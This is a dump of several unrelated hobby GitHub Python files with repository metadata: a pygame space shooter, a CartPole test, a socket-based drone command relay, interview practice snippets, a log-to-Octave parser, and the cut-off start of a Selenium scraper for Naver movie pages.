self.rect = self.image.get_rect()\n self.rect.center = center\n self.speedy = 3\n \n def update(self):\n self.rect.y += self.speedy\n \n # Deletes power up if it leaves screen\n if self.rect.top > HEIGHT:\n self.kill()\n \n \n# Explosions\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosionAnim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.lastUpdate = pygame.time.get_ticks()\n self.frameRate = 75 \n \n def update(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > self.frameRate:\n self.lastUpdate = now\n self.frame += 1\n if self.frame == len(explosionAnim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosionAnim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n \n\n# Plays Game Over Screen\ndef show_gameover_screen():\n pygame.mixer.music.stop()\n screen.blit(background, (0,0))\n draw_text(screen, \"STARFIGHTER\", 64, WIDTH / 2, HEIGHT / 4)\n draw_text(screen, \"WASD keys to move, Space to fire\", 22, WIDTH / 2, HEIGHT / 2)\n draw_text(screen, \"Press the ESC key to begin...\", 18, WIDTH /2 , HEIGHT * 3 / 4)\n pygame.display.flip()\n waiting = True\n while waiting:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n waiting = False\n \n\n# Load all graphics\nbackground = pygame.image.load(os.path.join(imgFolder, \"back.png\")).convert()\nbackground = pygame.transform.scale(background, (WIDTH,HEIGHT+5))\nplayerImg = pygame.image.load(os.path.join(imgFolder, \"playerShip2_green.png\")).convert()\nplayerImg = pygame.transform.scale(playerImg, (56, 37))\nplayerMiniImg = pygame.transform.scale(playerImg, (28, 19))\nplayerMiniImg.set_colorkey(BLACK)\nblueBulletOrigImg = pygame.image.load(os.path.join(imgFolder, \"laserBlue08.png\")).convert()\nblueBulletImg = pygame.transform.scale(blueBulletOrigImg, (20,20))\ngreenBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserGreen14.png\")).convert()\ngreenBulletImg = pygame.transform.scale(greenBulletImg, (20,20))\nredBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserRed08.png\")).convert()\nredBulletImg = pygame.transform.scale(redBulletImg, (20,20))\nsideBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserGreen10.png\")).convert()\naaBulletImg = pygame.image.load(os.path.join(imgFolder, \"laserRed16.png\")).convert()\nufoImg = pygame.image.load(os.path.join(imgFolder, \"ufoRed.png\")).convert()\nufoImg = pygame.transform.scale(ufoImg, (110,110))\ngunshipImg = pygame.image.load(os.path.join(imgFolder, \"enemyRed4.png\")).convert()\ngunshipImg = pygame.transform.scale(gunshipImg, (103,105))\nbossImg = pygame.image.load(os.path.join(imgFolder, \"boss.png\")).convert()\nbossImg = pygame.transform.scale(bossImg, (524, 408))\nbossDamagedImg = pygame.image.load(os.path.join(imgFolder, \"boss_damaged.png\")).convert()\nbossDamagedImg = pygame.transform.scale(bossDamagedImg, (524, 408))\n\nfighterImg = []\nfighterList = [\"enemyBlack1.png\", \"enemyBlack2.png\", \"enemyBlack3.png\"]\nfor img in fighterList:\n f = pygame.image.load(os.path.join(imgFolder, img)).convert()\n f = pygame.transform.scale(f, (56,37))\n fighterImg.append(f) \n \nmeteorImg = []\nmeteorList = [\"meteorBrown_big1.png\", \"meteorBrown_big2.png\", \"meteorBrown_big3.png\", 
\"meteorBrown_big4.png\",\n \"meteorBrown_med1.png\", \"meteorBrown_med2.png\", \"meteorBrown_small1.png\",\n \"meteorBrown_small2.png\", \"meteorBrown_tiny1.png\", \"meteorBrown_tiny2.png\"]\nfor img in meteorList:\n meteorImg.append(pygame.image.load(os.path.join(imgFolder, img)).convert())\n \nexplosionAnim = {}\nexplosionAnim[\"lg\"] = []\nexplosionAnim[\"sm\"] = []\nexplosionAnim[\"nuke\"] = []\nfor i in range(9):\n filename = \"regularExplosion0{}.png\".format(i)\n img = pygame.image.load(os.path.join(imgFolder, filename)).convert()\n img.set_colorkey(BLACK)\n imgLg = pygame.transform.scale(img, (75,75))\n explosionAnim[\"lg\"].append(imgLg)\n imgSm = pygame.transform.scale(img, (32,32))\n explosionAnim[\"sm\"].append(imgSm)\n filename = \"sonicExplosion0{}.png\".format(i)\n img = pygame.image.load(os.path.join(imgFolder, filename)).convert()\n img.set_colorkey(BLACK)\n explosionAnim[\"nuke\"].append(img)\n\npowerUpImg = {}\npowerUpImg[\"shield\"] = pygame.image.load(os.path.join(imgFolder, \"shield_gold.png\")).convert()\npowerUpImg[\"gun\"] = pygame.image.load(os.path.join(imgFolder, \"bolt_gold.png\")).convert()\n \n# Load all sounds\nlaser1 = pygame.mixer.Sound(os.path.join(sndFolder, \"Laser_Shoot.wav\"))\nlaser1.set_volume(0.2)\nlaser2 = pygame.mixer.Sound(os.path.join(sndFolder, \"Enemy_Shoot.wav\"))\nlaser2.set_volume(0.2)\nlaser3 = pygame.mixer.Sound(os.path.join(sndFolder, \"Gunship_Shoot.wav\"))\nlaser3.set_volume(0.2)\ndam = pygame.mixer.Sound(os.path.join(sndFolder, \"Hit.wav\"))\ndam.set_volume(0.6)\nboom = pygame.mixer.Sound(os.path.join(sndFolder, \"rumble1.ogg\"))\nboom.set_volume(0.6)\nlaserPower = pygame.mixer.Sound(os.path.join(sndFolder, \"laser_power.wav\"))\nlaserPower.set_volume(0.6)\nshieldPower = pygame.mixer.Sound(os.path.join(sndFolder, \"shield_power.wav\"))\nshieldPower.set_volume(0.6)\nexplosionSnds = []\nexpList = [\"Explosion1.wav\", \"Explosion2.wav\", \"Explosion3.wav\"]\nflyby = pygame.mixer.Sound(os.path.join(sndFolder, \"flyby.wav\"))\nflyby.set_volume(0.4)\nalarm = pygame.mixer.Sound(os.path.join(sndFolder, \"RedAlert.wav\"))\nfor snd in expList:\n container = pygame.mixer.Sound(os.path.join(sndFolder, snd))\n container.set_volume(0.4)\n explosionSnds.append(container)\n\n\n# Game Loop\nrunning = True \ngame_over = True\n\nwhile running:\n if game_over:\n show_gameover_screen()\n boss_killed = False\n\n # Initialize all sprite groups\n player = Player()\n mobs = pygame.sprite.Group()\n fighter = pygame.sprite.Group()\n gunship = pygame.sprite.Group()\n ufo = pygame.sprite.Group()\n bullets = pygame.sprite.Group()\n eBullets = pygame.sprite.Group()\n powerUps = pygame.sprite.Group()\n boss = pygame.sprite.Group()\n allSprites = pygame.sprite.Group()\n allSprites.add(player)\n \n # Initialize User Events\n game_start = pygame.USEREVENT + 0\n meteor_wave = pygame.USEREVENT + 1\n fighter_wave = pygame.USEREVENT + 2\n new_music = pygame.USEREVENT + 3\n ufo_wave = pygame.USEREVENT + 4\n gunship_wave = pygame.USEREVENT + 5\n alert = pygame.USEREVENT + 6\n boss_wave = pygame.USEREVENT + 7\n \n pygame.time.set_timer(game_start, 1)\n pygame.time.set_timer(meteor_wave, 4000)\n pygame.time.set_timer(fighter_wave, 22000)\n pygame.time.set_timer(new_music, 44500)\n pygame.time.set_timer(ufo_wave, 46000)\n pygame.time.set_timer(gunship_wave, 85000)\n pygame.time.set_timer(alert, 145000)\n pygame.time.set_timer(boss_wave, 151000)\n\n score = 0\n x = 0\n x1 = 0\n y = 0\n y1 = -HEIGHT\n support = False\n game_over = False\n\n clock.tick(FPS) \n \n # Process input 
(events)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN and boss_killed == True:\n if event.key == pygame.K_ESCAPE:\n game_over = True \n if event.type == game_start:\n pygame.mixer.music.load(os.path.join(sndFolder, \"Battle.ogg\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n pygame.time.set_timer(game_start, 0)\n if event.type == meteor_wave:\n for i in range(15):\n new_mob(Asteroid,mobs)\n pygame.time.set_timer(meteor_wave, 0)\n if event.type == fighter_wave:\n if support == False:\n for i in range(3):\n new_mob(EnemyFighter,fighter)\n pygame.time.set_timer(fighter_wave, 2000)\n if support == True and len(fighter) < 3:\n for i in range(2):\n new_mob(EnemyFighter,fighter)\n pygame.time.set_timer(fighter_wave, 5000)\n if event.type == new_music:\n pygame.mixer.music.load(os.path.join(sndFolder, \"Battle dirty.ogg\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n pygame.time.set_timer(new_music, 0)\n if event.type == ufo_wave:\n if len(ufo) < 2:\n new_mob(UFO, ufo)\n pygame.time.set_timer(ufo_wave, 6500)\n pygame.time.set_timer(fighter_wave, 3000)\n if event.type == gunship_wave: \n if len(gunship) == 0:\n new_mob(Gunship,gunship)\n pygame.time.set_timer(fighter_wave, 4000)\n pygame.time.set_timer(ufo_wave, 4000)\n pygame.time.set_timer(gunship_wave, 8000)\n if event.type == alert:\n pygame.mixer.music.stop()\n pygame.time.set_timer(fighter_wave, 15000)\n pygame.time.set_timer(ufo_wave, 0)\n pygame.time.set_timer(gunship_wave, 0)\n pygame.time.set_timer(alert, 0)\n for enemy in fighter:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n for enemy in gunship:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n for enemy in ufo:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n boom.play()\n alarm.play()\n if event.type == boss_wave:\n support = True\n pygame.time.set_timer(ufo_wave, 0)\n pygame.time.set_timer(gunship_wave, 0)\n pygame.mixer.music.load(os.path.join(sndFolder, \"CPU_Showdown.mp3\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n new_mob(Boss, boss)\n pygame.time.set_timer(boss_wave, 0)\n\n # Update\n allSprites.update()\n eBullets.update()\n\n # Check for bullet collisions\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True, pygame.sprite.collide_circle)\n for hit in hits:\n random.choice(explosionSnds).play()\n if hit.radius < 15 and hit.radius:\n score += 75\n elif hit.radius > 15 and hit.radius < 30:\n score += 50\n elif hit.radius > 30:\n score += 25\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n if random.random() > 0.90:\n pow = PowerUp(hit.rect.center)\n allSprites.add(pow)\n powerUps.add(pow) \n new_mob(Asteroid,mobs)\n\n hits = pygame.sprite.groupcollide(fighter, bullets, True, True)\n for hit in hits:\n random.choice(explosionSnds).play()\n score += 150\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n\n hits = pygame.sprite.groupcollide(gunship, bullets, False, True)\n for hit in hits:\n dam.play()\n expl = Explosion(hit.rect.center, 'sm')\n allSprites.add(expl)\n hit.health -= 1\n if hit.health == 0:\n hit.kill()\n boom.play()\n score += 300\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n \n hits = pygame.sprite.groupcollide(ufo, bullets, False, True, pygame.sprite.collide_circle)\n for hit in hits:\n dam.play()\n hit.health -= 1\n expl = Explosion(hit.rect.center, 
'sm')\n allSprites.add(expl)\n if hit.health == 0:\n hit.kill()\n boom.play()\n score += 250\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n \n hits = pygame.sprite.groupcollide(boss, bullets, False, True, pygame.sprite.collide_circle)\n for hit in hits:\n dam.play()\n score += 125\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n hit.health -= 1\n hit.damaged = True\n if hit.health == 0:\n pygame.time.set_timer(fighter_wave, 0)\n for enemy in fighter:\n expl = Explosion(enemy.rect.center, 'lg')\n allSprites.add(expl)\n enemy.kill()\n for bul in eBullets:\n expl = Explosion(bul.rect.center, 'lg')\n allSprites.add(expl)\n bul.kill()\n for meteor in mobs:\n expl = Explosion(bul.rect.center, 'lg')\n allSprites.add(expl)\n meteor.kill()\n hit.kill()\n boom.play()\n score += 5000\n expl = Explosion(hit.rect.center, 'nuke')\n allSprites.add(expl)\n boss_killed = True\n pygame.mixer.music.load(os.path.join(sndFolder, \"victory.mp3\"))\n pygame.mixer.music.set_volume(1)\n pygame.mixer.music.play(-1)\n\n # Check for collisions\n hits = pygame.sprite.spritecollide(player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= (hit.radius * 2) * 1.25\n random.choice(explosionSnds).play()\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n new_mob(Asteroid,mobs)\n if player.shield <= 0:\n boom.play()\n deathExpl = Explosion(player.rect.center, 'nuke')\n allSprites.add(deathExpl)\n player.hide()\n player.lives -= 1\n player.shield = 100 \n\n hits = pygame.sprite.spritecollide(player, fighter, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= 100\n random.choice(explosionSnds).play()\n expl = Explosion(hit.rect.center, 'lg')\n allSprites.add(expl)\n new_mob(EnemyFighter,fighter)\n if player.shield <= 0:\n boom.play()\n deathExpl = Explosion(player.rect.center, 'nuke')\n allSprites.add(deathExpl)\n player.hide()\n player.lives -= 1\n player.shield = 100 \n\n hits = pygame.sprite.spritecollide(player, eBullets, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= 15\n dam.play()\n expl = Explosion(hit.rect.center, 'sm')\n allSprites.add(expl)\n if player.shield <= 0:\n boom.play()\n deathExpl = Explosion(player.rect.center, 'nuke')\n allSprites.add(deathExpl)\n player.hide()\n player.lives -= 1\n player.shield = 100 \n\n hits = pygame.sprite.spritecollide(player, powerUps, True)\n for hit in hits:\n if hit.type == \"shield\":\n shieldPower.play()\n player.shield += 20\n score += 500\n if player.shield >= 100:\n player.shield = 100\n if hit.type == \"gun\":\n laserPower.play()\n score += 500\n player.powerup() \n\n # Waits for death animation to finish\n if player.lives == 0 and not deathExpl.alive():\n pygame.mixer.music.stop()\n game_over = True\n\n # Draw / render\n y1 += 1\n y += 1\n\n screen.fill(BLACK)\n screen.blit(background, (x,y))\n screen.blit(background, (x1,y1))\n if y > HEIGHT:\n y = -HEIGHT\n if y1 > HEIGHT:\n y1 = -HEIGHT\n allSprites.draw(screen)\n eBullets.draw(screen)\n draw_text(screen, str(score), 18, WIDTH / 2, 10)\n draw_shield_bar(screen, 5, 5, player.shield)\n draw_lives(screen, WIDTH - 100, 5, player.lives, playerMiniImg)\n\n # Display images\n if boss_killed == True:\n draw_text(screen, \"YOU WON!!!\", 64, WIDTH / 2, HEIGHT / 4)\n draw_text(screen, \"Final Score: \" + str(score), 22, WIDTH / 2, HEIGHT / 2)\n draw_text(screen, \"Press ESC to quit...\", 22, WIDTH / 2, HEIGHT * 0.75)\n 
pygame.display.flip()\n\npygame.quit()\n","repo_name":"martinMomo/starfighter","sub_path":"starfighter.py","file_name":"starfighter.py","file_ext":"py","file_size_in_byte":40451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20333283110","text":"from model import *\nimport gym \nfrom mxnet import nd, gluon\nimport mxnet as mx\nimport numpy as np\n\n\n\n'''\nenv = gym.make('CartPole-v0')\n\n# Simple state / action space\naction_dim = env.action_space.n\nobservation_dim = env.observation_space.shape[0]\n\n# Network definition\nnet = ActorCritic(observation_dim, action_dim)\nnet.collect_params().initialize()\n\ntest_input = nd.uniform(shape=(1, observation_dim))\ntest_out = net(test_input)\n\nprint(\"Success forward\")\n'''\n\n\nenv = gym.make('CartPole-v0')\nob = env.reset()\n\nprint('Action space', env.action_space)\nprint('Observation space', env.observation_space)\n\n\ndef run_episode(env, parameters): \n observation = env.reset()\n totalreward = 0\n for _ in range(200):\n action = 0 if np.matmul(parameters,observation) < 0 else 1\n observation, reward, done, info = env.step(action)\n env.render()\n totalreward += reward\n if done:\n print('Episode ended | Reward is', totalreward)\n break\n return totalreward\n\n\nbestparams = None \nbestreward = 0 \nfor _ in range(10000): \n parameters = np.random.rand(4) * 2 - 1\n reward = run_episode(env,parameters)\n if reward > bestreward:\n bestreward = reward\n bestparams = parameters\n # considered solved if the agent lasts 200 timesteps\n if reward == 200:\n break","repo_name":"dai-dao/PPO-Gluon","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"35434547679","text":"import socket\nimport threading\nfrom drone_class import DroneControl\nimport string\n\n# Use lock.acquire() when you are entering a part of the code that makes modifications to a shared object to\n# ensure that no other threads modify that object during this time.\n# Don't forget to use lock.release() [!] 
when you are done modifying the object, or the program will get stuck here.\nlock = threading.Lock()\nIP_ADDRESS = \"192.168.11.115\"\nPORT = 5005\nclient_conn = None\n# Use threading.Events to interrupt other threads/check if a condition is still true before moving on.\n# http://zulko.github.io/blog/2013/09/19/a-basic-example-of-threads-synchronization-in-python/\n# Basically, create an event for things that might happen such as a \"new command event\"\n# Clear the event when it is not true, set the event when it becomes true, and check if the event is set or not\n# before doing something that is dependent on the event happening.\n\n\ndef connect_to_app():\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    sock.bind((IP_ADDRESS, PORT))\n    print('[STATUS] Drone is bound to ' + IP_ADDRESS + \", \" + str(PORT) + \" and waiting for app connection.\")\n    sock.listen(1)\n    conn, addr = sock.accept()\n    print(\"Successfully connected to \" + str(addr))\n    return conn\n\n\ndef connect_to_drone():\n    print('[STATUS] Pi is Connecting to Pixracer')\n    drone = DroneControl()\n    print('Successfully connected to Pixracer')\n    return drone\n\n\nclass AndroidAppDriver:\n    def __init__(self, drone, app_stream):\n        self.drone = drone\n        self.app_stream = app_stream\n\n    #Waypoint commands are commented out because compass on drone is damaged, will cause drone to crash\n    def listen_for_user_input(self):\n        def listen_thread():\n            while True:\n                try:\n                    incoming_command = android_app_stream.recv(1024)\n                    words = incoming_command.split(\",\")\n                    print(\"[STATUS] Processing string: \" + incoming_command)\n                    if \"quit\" in incoming_command:\n                        print(\"Quit Command Read\")\n                    if \"move\" in incoming_command:\n                        print(\"Move command Read\")\n                        self.drone.move_drone_nogps(float(words[3]), float(words[1]), float(words[2]), float(words[4]), 0, 1, 0)\n                    if \"takeoff\" in incoming_command:\n                        print(\"Takeoff command read\")\n                        #drone.arm_and_takeoff(float(words[1]))\n                    if \"waypoint\" in incoming_command:\n                        print(\"Waypoint command read\")\n                        #drone.waypoint_navigation(float(words[1]), float(words[2]), float(words[3]),0.5)\n                    if \"land\" in incoming_command:\n                        print(\"Land command read\")\n                        #drone.land()\n                    if \"stop\" in incoming_command:\n                        drone.emergency_stop()\n                    if \"arm\" in incoming_command:\n                        drone.arm_drone(int(words[1]))\n                    if \"status\" in incoming_command:\n                        print(\"Status command read\")\n                        self.app_stream.sendall(drone.status())\n                except:\n                    print(\"Error in input command\")\n\n        curr_thread = threading.Thread(target=listen_thread, args=())\n        curr_thread.start()\n\n\nif __name__ == '__main__':\n    drone = connect_to_drone()\n    android_app_stream = connect_to_app()\n\n\n    driver = AndroidAppDriver(drone, android_app_stream)\n\n    driver.listen_for_user_input()\n\n","repo_name":"adityawadaskar/android-app-drone-control","sub_path":"Drone Code/android_app_driver.py","file_name":"android_app_driver.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34806570028","text":"# reversing a number\r\nnum = int(input(\"Enter a number:\"))\r\ntemp = num\r\nreverse = 0\r\nwhile num > 0:\r\n    remainder = num % 10\r\n    reverse = (reverse * 10) + remainder\r\n    num = num // 10\r\n\r\nprint(f\"The given number is {temp} and reverse is {reverse}\")\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# GCD of two numbers\r\ndef gcd(a, b):\r\n    while b:\r\n        a, b = b, a % b\r\n    return a\r\n\r\n# Example usage:\r\nprint(gcd(8, 12)) # Outputs: 4\r\n
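The synchronization notes at the top of the drone driver above describe a lock-and-event discipline in prose only. Here is a minimal, self-contained sketch of that pattern (the `shared_state` and `worker` names are illustrative, not part of the original driver):

    import threading

    shared_state = {"last_command": None}
    lock = threading.Lock()
    stop_event = threading.Event()

    def worker():
        # Check the event before each iteration instead of looping forever
        while not stop_event.is_set():
            # The context manager pairs acquire() with a guaranteed release()
            with lock:
                shared_state["last_command"] = "status"
            # Sleep, but wake immediately if the event gets set
            stop_event.wait(timeout=0.5)

    t = threading.Thread(target=worker)
    t.start()
    stop_event.set()  # signal the thread to finish cleanly
    t.join()

Using `with lock:` avoids the stuck-program failure mode the comments warn about, since the lock is released even if the block raises.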
\r\n# ---------------------------------------------------------------\r\n\r\n# LCM of two numbers\r\ndef lcm(a, b):\r\n    return abs(a*b) // gcd(a, b)\r\n\r\n# Example usage:\r\nprint(lcm(12, 15))\r\n\r\n# ---------------------------------------------------------------\r\n\r\n#Calculating factorial\r\ndef factorial(n):\r\n    result = 1\r\n    for i in range(1, n+1):\r\n        result *= i\r\n    return result\r\n\r\n# Example usage:\r\nprint(factorial(5)) # Outputs: 120\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Combinations\r\ndef combination(n,r):\r\n    return factorial(n) // (factorial(r) * factorial(n-r))\r\n\r\n# Example usage:\r\nprint(combination(5,2))\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Check whether a string is a palindrome\r\ndef isPalindrome(s):\r\n    return s == s[::-1]\r\n\r\ns = \"malayalam\"\r\nans = isPalindrome(s)\r\nif ans:\r\n    print(\"Yes\")\r\nelse:\r\n    print(\"No\")\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Fibonacci Series\r\n\r\nnum = int(input(\"Enter the number:\"))\r\nn1, n2 = 0, 1\r\nprint(\"Fibonacci series: \", n1, n2, end =\" \")\r\nfor i in range(2, num):\r\n    n3 = n1 + n2\r\n    n1 = n2\r\n    n2 = n3\r\n    print(n3, end = \" \")\r\n\r\nprint()\r\n\r\n# ---------------------------------------------------------------\r\n\r\n#Perfect number\r\n\r\nn = int(input(\"Enter any number: \"))\r\nsump= 0\r\nfor i in range(1, n):\r\n    if(n % i == 0):\r\n        sump= sump + i\r\n\r\nif (sump == n):\r\n    print(\"The number is a Perfect number\")\r\nelse:\r\n    print(\"The number is not a Perfect number\")\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# To find Leap year\r\n\r\nyear = int(input(\"Enter Year:\"))\r\nif (year % 400 == 0) or (year % 4 == 0 and year % 100 != 0):\r\n    print(\"Leap year\")\r\nelse:\r\n    print(\"Not a Leap year\")\r\n\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# reversing a string\r\n\r\nstr1 = \"Analytics Vidhya\" \r\nstr2 = \"\" \r\nfor i in str1: \r\n    str2 = i + str2\r\n\r\nprint(\"The original string is: \",str1) \r\nprint(\"The reversed string is: \",str2)\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Finding missing elements in List\r\n\r\ntest_list = [3, 5, 6, 8, 10]\r\n \r\n# using list comprehension\r\n# Finding missing elements in List\r\nres = [ele for ele in range(max(test_list)+1) if ele not in test_list]\r\n\r\nprint('The list of missing elements : ' + str(res))\r\n\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Concatenate two lists\r\n\r\nlst1= ['W', 'a', 'w','b']\r\nlst2 = ['e', ' ','riting','log'] \r\nlst3 = [x + y for x, y in zip(lst1, lst2)] \r\nprint(lst3)\r\n\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# square of every element in a list\r\nlst = [1, 2, 3, 4]\r\n\r\nresult = [x**2 for x in lst]\r\nprint(result)\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Checking for Prime number\r\n\r\nnum = 11\r\n# If given number is greater than 1\r\nif num > 1:\r\n    # Iterate from 2 to n / 2\r\n    for i in range(2, int(num/2)+1):\r\n        # If num is divisible by any number between\r\n        # 2 and n / 2, it is not prime\r\n        if (num % i) == 0:\r\n            print(num, \"is not a prime number\")\r\n            break\r\n    else:\r\n        print(num, \"is a prime number\")\r\nelse:\r\n    print(num, \"is not a prime number\")\r\n\r\n# Another method using sqrt\r\n\r\nfrom math import sqrt\r\ndef prime_or_not(n):\r\n    for i in range(2, int(sqrt(n))+1):\r\n        if n % i == 0:\r\n            return \"Not a prime number\"\r\n    return \"Prime number\"\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# Calculating factorial using recursion\r\n\r\ndef factorial(n):\r\n    if n <= 1:\r\n        return 1\r\n    else:\r\n        return n * factorial(n-1)\r\nfactorial(5)\r\n\r\n# ---------------------------------------------------------------\r\n\r\n# How do you find the minimum value in a list with a lambda function?\r\n\r\nfrom functools import reduce\r\n\r\nb = [3, 1, 4, 1, 5, 9, 2, 6]\r\nminimum_value = reduce(lambda x, y: x if x < y else y, b)\r\nprint(minimum_value) # Outputs: 1\r\n\r\n\r\n# Write a code to get the minimum value in a dictionary.\r\ndict_ = {\r\n    'a': 10,\r\n    'b': 5,\r\n    'c': 15,\r\n    'd': 2\r\n}\r\n\r\nmin_value = min(dict_.values()) # Outputs 2\r\n\r\n# If you want the key associated with the min value:\r\n\r\nkey_with_min_value = min(dict_, key=lambda k: dict_[k])\r\nprint(key_with_min_value) # Outputs: 'd'\r\n","repo_name":"Ajeeth12/Python","sub_path":"Python_questions.py","file_name":"Python_questions.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42566114346","text":"pageLog = open(\"pages.log\", \"r\")\nparsedPageLog = open(\"octavePagesBusiness.m\", \"w\", encoding=\"utf-8\")\n\npagesStatus = [0 for i in range(20)]\ntimeOctave = [0]\n\npagesRead = []\npagesWrite = []\npagesFree = [i for i in range(20)]\n\npagesReadOctave = [0]\npagesWriteOctave = [0]\npagesFreeOctave = [20]\n\nminTime = -1\n\nfor line in pageLog:\n\ttime, page, status = int(line[:line.find(\" \")]), int(line[line.find(\"|\")+1:line.find(\":\")]), line[line.find(\":\")+2:]\n\tif(minTime == -1):\n\t\tminTime = time-10\n\ttime = time - minTime\n\t#parsedPageLog.write(f\"Time: {time}, page: {page}, status: {status}\")\n\tif(\"writing in\" in status):\n\t\tif page in pagesRead:\n\t\t\tpagesRead.remove(page)\n\t\telif page in pagesFree:\n\t\t\tpagesFree.remove(page)\n\t\tpagesWrite.append(page)\n\telif(\"is being read\" in status):\n\t\tif page in pagesWrite:\n\t\t\tpagesWrite.remove(page)\n\t\telif page in pagesFree:\n\t\t\tpagesFree.remove(page)\n\t\tpagesRead.append(page)\n\telse:\n\t\tif page in pagesWrite:\n\t\t\tpagesWrite.remove(page)\n\t\telif page in pagesRead:\n\t\t\tpagesRead.remove(page)\n\t\tif page not in pagesFree:\n\t\t\tpagesFree.append(page)\n\t\n\ttimeOctave.append(time)\n\tpagesReadOctave.append(len(pagesRead))\n\tpagesWriteOctave.append(len(pagesWrite))\n\tpagesFreeOctave.append(len(pagesFree))\n\nparsedPageLog.write(f\"time = {timeOctave};\\nread = {pagesReadOctave};\\nwrite = {pagesWriteOctave};\\nfree = {pagesFreeOctave};\\n\")\nparsedPageLog.write(\"figure;\\nhold on;\\nplot(time, read, \\\"r\\\");\\nplot(time, write, \\\"b\\\");\\nplot(time, free, \\\"g\\\");\\nxlabel(\\\"Время, мс\\\")\\nhold off;\")\npageLog.close()\nparsedPageLog.close()","repo_name":"Leha009/OS","sub_path":"4/1/_PagesStates.py","file_name":"_PagesStates.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14542735378","text":"from selenium import webdriver\nimport constants as const\nimport re\nimport numpy as np\nimport time\nimport tqdm\nfrom sql_functions import SQL\n\nclass
Naver_scrapping(webdriver.Chrome):\n def __init__(self, driver_path = \"/Users/hyojin/chromedriver\", teardown=False):\n self.teardown = teardown\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n # options.add_argument('--no-sandbox')\n # options.add_argument('--disable-dev-shm-usage')\n # options.add_argument('start-maximized')\n super(Naver_scrapping, self).__init__(options=options, executable_path=driver_path)\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #영화 연도 선택 페이지 이동 & 원하는 링크로 이동\n def land_page(self, link=const.MOVIE_DIRECORY_URL):\n self.get(link)\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n if link==const.MOVIE_DIRECORY_URL:\n self.find_element_by_xpath('/html/body/div/div[4]/div/div/div/div/div[1]/div[1]/ul/li[3]/a/img').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #해당 연도 영화 목록으로 이동\n def land_directory_of_year(self, year):#/html/body/div/div[4]/div/div/div/div/div[1]/table/tbody/tr[2]/td[1]/a\n if year>=2020:\n top = 2024\n line = 1\n elif year>=2016:\n top=2020\n line = 2\n elif year>=2012:\n top=2016\n line = 3\n self.find_element_by_class_name('directory_item_other').find_element_by_css_selector('#old_content > table > tbody > tr:nth-child('+str(line)+') > td:nth-child('+str(top-year)+') > a').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #영화 목록에서 다음 페이지로 이동\n def land_next_page(self):\n self.find_element_by_class_name(\"pagenavigation\").find_element_by_css_selector(\"#old_content > div.pagenavigation > table > tbody > tr > td.next\").click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #다음 페이지로 이동\n def land_next_page_review(self):\n self.find_element_by_xpath('//*[@id=\"pagerTagAnchor2\"]/em').click()\n self.implicitly_wait(const.IMPLICIT_WAIT_TIME)\n #해당 연도의 각 영화 URL 수집 함수\n def get_movies_in_the_page(self):\n movie_urls = []\n while True:\n for i in range(20):\n try:\n movie_urls.append(self.find_element_by_css_selector('#old_content > ul > 